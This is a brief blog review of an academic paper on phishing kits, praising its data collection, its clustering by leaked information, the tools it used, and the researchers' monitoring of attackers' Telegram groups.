💡This is a reader's perspective on the paper written by Bhaskar Tejaswi (from the Concordia University) and published at the APWG Symposium on Electronic Crime Research 2022.
Brief Description
Observations
There are some interesting related works pointed out by the paper regarding "identification and collection of phishing kits", which might point out some alternatives to cluster phishing kits using some fingerprints. Which is still a nice study GAP.
One nice thing is the idea of clustering the phishing kits based on the leaked information they gathered. While it is very primitive clustering, it is a nice idea to see different variations of a phishing kit.
Initial Questions
The first thing I asked myself was about the way they used to acquire this large data on phishing kits, since is it an interesting research topic. In the end, they presented that they used PhishFinder, which is a common technique used to find phishing kits from hosted phishing pages.
Where do the experiment ideas come from?
Their whole paper was created on the idea of analyzing leaked information from phishing kits, starting from the phishing kit collection system to the ideas of experiments on the collected phishing kit.
What are the interesting ideas/results?
I like the dynamic analysis tool they developed to run the phishing kit without having to host it.
They also use a nice tool PhishFinder to discover phishing kits using URLs from open repositories.
Nice tool to discover sensitive information on files PDSCAN.
Nice tool Whispers finds interesting information on the source code of phishing kits.
One awesome experiment they thought of was to enter the Telegram group to see the information that was sent in there. That was indeed a very nice finding and provides a measure to the size of the problem (HUGE).
No comments:
Post a Comment